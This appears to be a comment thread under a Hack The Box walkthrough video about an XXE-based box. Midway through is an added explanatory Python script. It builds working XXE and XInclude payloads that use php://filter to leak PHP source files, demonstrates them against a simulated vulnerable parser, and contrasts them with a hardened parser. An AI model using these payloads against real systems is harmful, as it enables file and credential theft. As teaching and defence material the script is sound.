Love your content!! Was stuck on the XXE doing it on my own, luckily for me you uploaded this tutorial. Had a lot of fun doing the command line interface on python! Keep up the insane work!
How is every step of enumeration and footprinting going so easy and smooth, but also reasonable. It's amazing.
first one , Love u from Morocco you Are a LEGEND by the way
A true "Senpai"
Thank you for all that you do.
This one surprised me because of the XXE, but it was obvious after I had found the code disclosure. Definitely had me refreshing my XML skills.
Earlier I tried this box but didn't complete it because something was unknown to me, like I didn't know how to do that. Thank you for the video and for teaching everything; I will watch this tonight and also complete the box. 🙏🌟
This was a pretty ingenious machine, not too hard but just tricky/hard enough depending on your experience. Plus it was great to practice some code analysis at the beginner/easy level
Great vid once again! Really is so easy to understand when watching you do it, and I often come away with some great tips. Thanks a lot
I like when Ipp says if you're not running anything every second you are just wasting ....
It is so insane how fast these videos go.
It's almost like ippsec and I had the exact same approach to making a video on this box! Though he always does it better!
Say the form was as in this video, but instead of the XML body being generated client-side, it sends the four variables you input and generates the XML server-side. Is there still a way to get XXE in this scenario? Obviously in this case you couldn't add entities to the DOCTYPE, but is there any way to do it inline?
You could potentially use an xinclude I think, but that would require the schema being available.
sir...you are talented, thanks for sharing!
OMG! ippsec, That xxe py is awesome 🤤
Love the way you give the information. thank you
Little note: this machine is a Linux machine and you put it in a Windows playlist. You can fix this.
Thanks fixed it
Do you run through boxes first before recording?
I was wondering the same thing. What he accomplished in the first 15 minutes would probably take me hours, not including time spent banging my head on the desk 😂 he's a wizard either way
Great video 👏🏽
this is useful, thank you sir
this machine was neat. I almost got blood on it as well, was like 20 seconds from it
Ok thanks
This is considered an easy box? 😰 Or were you just having fun because you're bored? Could you have just done a GTFOBins sudo python to get priv esc?
It is, but while it's technically easy (scan website, find creds, use known technique, SSH over) that was also one hell of a specific piece of knowledge needed for this. I'm amazed I've never heard of XXE or PayloadsAllTheThings until now somehow, and that's with several Udemy courses and HTB machines over the last 2 years.
And while that route is something that exists for other machines, this machine seemed to have the sudo -l NOPASSWD tied specifically to that python version and script (which also no one had write access to, so you couldn't just add a line at the beginning to pop a shell), so not sure that would work.
Although I do have one or two things I'm interested in trying to see if there are alternate ways to get more info or access on this. I kinda hate that XXE thing. It's good to know but just strikes me as incredibly oddly specific for some reason. Then again, so were the tickets, and sometimes that's just what's needed. But still. Argh.
Thx
Thanks so much
Hey @IppSec, would you say this box is OSCP level? Or is it above that? And as always, GREAT CONTENT! It's amazing what you do for the community!!!
How do I stop an active machine in Hack The Box? I cannot do anything until it is stopped. However, I cannot see any active machines.
If you have an IP spawned for a machine it will be considered active. Make sure you go back through the previous box you were doing and disconnect it
Did you use the database user password to log in to the developer SSH account? In the real world this scenario is highly impossible... :(
I think you’d be surprised how often credential reuse is a problem
39:38
when you said "and we're now root" i felt like you just hacked some nsa like server :D
Hey ippsec, do you still use Obsidian for notes?
Bro, I am a beginner, I don't know anything about hacking. Where should I start and what should I learn to start on Hack The Box?
Thanks for the content ippsec
Wow
4rth Comment ❤️🇵🇰
did ippsec upload the wrong box tutorial by accident?
What do you mean?
Not sure how this box got selected on HTB these days, but great video as usual.
What's wrong with this machine?
What may seem easy to some people, it may be difficult for others. I think HTB likes to cover all of the different areas of difficulty for those who aren’t able to get the VIP service.
@hadrian3689 You are right! But this box was so traditional, never expected such quality from HTB. There are easy boxes on HTB but they have some twist... this box was like hey come, got root? No? OK, here we go!
Thanks a lot for the Videos!!
Any chance of doing a Secret walkthrough?
Peace!
When it retires he will. He doesn’t do live machines
@hadrian3689 Oh… I didn't know that! Thanks
🐶
Please do "Bolt", it is kinda hard.
If the php filter was blocked then we can also host our malicious DTD, and in our DTD we can generate a payload using CDATA to retrieve the PHP file contents.
How do you retrieve PHP source code from outside the host? I mean, when you get content from outside, the PHP script is interpreted by the webserver.
I didn't understand what you meant. Would you like to explain?
@slayeeerrr I tried it but failed :(, sorry for the comment.
I hosted a DTD file which contains the entity
and pointed that entity in the XML form field
but did not get the contents.
Sorry for this comment.
@Tech69YT Don't sweat it, bro! Thanks for replying!! :-)
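The two questions above (what happens when only the field values are under your control, and how PHP source comes back as text rather than being executed) are easiest to see in code. The following is an added example, not code from the video, the box, or any commenter: it builds the inline-DOCTYPE XXE payload using the php://filter base64 trick, shows what a server that resolves external entities hands back, gives the XInclude variant for the value-only case, and shows the parser-side check that stops it. The form field names, the fake file system contents, the echoed field and every function name are assumptions.

```python
"""Added example (not from the video or the box): XXE payload, a server that
resolves it, the XInclude variant, and the hardened parser.  The form fields,
FAKE_FS contents and all names here are assumptions."""
import base64
import xml.parsers.expat as expat
from xml.sax.saxutils import escape

# Constructed stand-in for the target's disk; path and contents are made up.
FAKE_FS = {
    "/var/www/html/db.php": b"<?php\n$dbuser = 'webapp';\n$dbpass = 'example-only';\n",
}
PHP_B64_FILTER = "php://filter/convert.base64-encode/resource="


def build_xxe_payload(target_path, fields, inject_into="message"):
    """Inline-DOCTYPE XXE for when the client controls the whole XML body.
    The base64 filter makes PHP hand over the source as text instead of the
    parser choking on '<?php'; the entity is referenced from one echoed field."""
    doctype = f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{PHP_B64_FILTER}{target_path}">]>'
    body = "".join(
        f"<{name}>{'&xxe;' if name == inject_into else escape(value)}</{name}>"
        for name, value in fields.items()
    )
    return f'<?xml version="1.0"?>{doctype}<data>{body}</data>'


def build_xinclude_value(target_path):
    """Value-only variant for when the server assembles the XML itself: there is
    no prologue to poison, so inject an XInclude element as a raw field value.
    It only fires if the server runs an XInclude pass (lxml .xinclude(),
    Java setXIncludeAware(true), ...)."""
    return (f'<xi:include xmlns:xi="http://www.w3.org/2001/XInclude" '
            f'href="file://{target_path}" parse="text"/>')


def _collect_fields(parser):
    """Record each element's text content in a dict keyed by element name."""
    fields, stack = {}, []

    def start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")

    def end(name):
        stack.pop()

    def chars(data):
        if stack:
            fields[stack[-1]] += data

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    return fields


def _php_filter_fetch(system_id):
    """Stand-in for PHP's stream layer: serve the one wrapper the payload uses."""
    if not system_id.startswith(PHP_B64_FILTER):
        raise ValueError("unsupported entity URI: " + system_id)
    return base64.b64encode(FAKE_FS[system_id[len(PHP_B64_FILTER):]]).decode()


def vulnerable_parse(xml_text):
    """The bug: external entities are fetched and spliced into the document."""
    parser = expat.ParserCreate()
    fields = _collect_fields(parser)

    def resolve(context, base, system_id, public_id):
        # The child parser shares the parent's handlers, so the fetched text
        # lands in whichever element referenced the entity.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(_php_filter_fetch(system_id), True)
        return 1  # non-zero: reference handled, keep parsing

    parser.ExternalEntityRefHandler = resolve
    parser.Parse(xml_text, True)
    return fields


def hardened_parse(xml_text):
    """The fix: untrusted XML gets no DTD at all, so no entity can be declared
    (the stdlib counterpart of never passing LIBXML_NOENT in PHP, or
    disallow-doctype-decl in Java parsers)."""
    parser = expat.ParserCreate()
    fields = _collect_fields(parser)

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE is not allowed in untrusted input")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = lambda *_: 0  # belt and braces: never fetch
    parser.Parse(xml_text, True)
    return fields


def decode_leaked_field(fields, field="message"):
    """Undo the base64 filter on the echoed field to recover the file bytes."""
    return base64.b64decode(fields[field])


if __name__ == "__main__":
    form = {"username": "alice", "email": "alice@example.com",
            "subject": "hi", "message": "hello"}
    payload = build_xxe_payload("/var/www/html/db.php", form)
    print(decode_leaked_field(vulnerable_parse(payload)).decode())
    try:
        hardened_parse(payload)
    except ValueError as err:
        print("hardened parser:", err)
```

Run it as-is and the vulnerable parser prints the fake db.php back; the hardened one refuses before any entity is declared. The XInclude helper is only the payload string: it does nothing against a server that never calls an XInclude processor, which is why the reply above is right that it depends on what the server does, and the same goes for a hosted DTD, which is just an external parameter entity and needs the server to fetch it.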
5th Comment 🔥🎉
Nmap only runs version detection/scripts on ports it finds open, as these are done after host discovery and port scanning. So there is no reason to run multiple nmap scans for this; using both options -p- and -A on the same scan is fine.
The first Nmap execution is valid for just taking all open ports quickly! That's where `--min-rate 10000 -sS -p-` comes from. So you can execute whatever you want straight at each (open) port afterward. Since -sS doesn't establish a TCP connection, and you need the handshake to enumerate thoroughly, running two Nmap scans is faster to take everything instead of executing `nmap -A -p- --min-rate 10000`, which can screw up the network environment.
Then again, using Nmap with `-p- -A` (a trivial aggressive scan on all ports) always takes a long time to finish, in contrast to `--min-rate 10000 -sS -p-`.
*Note: I should advise you that you don't have to worry about network performance in a CTF-like environment.
*Edit/Update: I had to get rid of dash characters.
Play Backdoor room pls
First. Notice me sensei!!
XXE
I wouldn't be where I am today if it wasn't for you ipp. Amazing content creator and teacher. 11/10 would recommend.
Thanks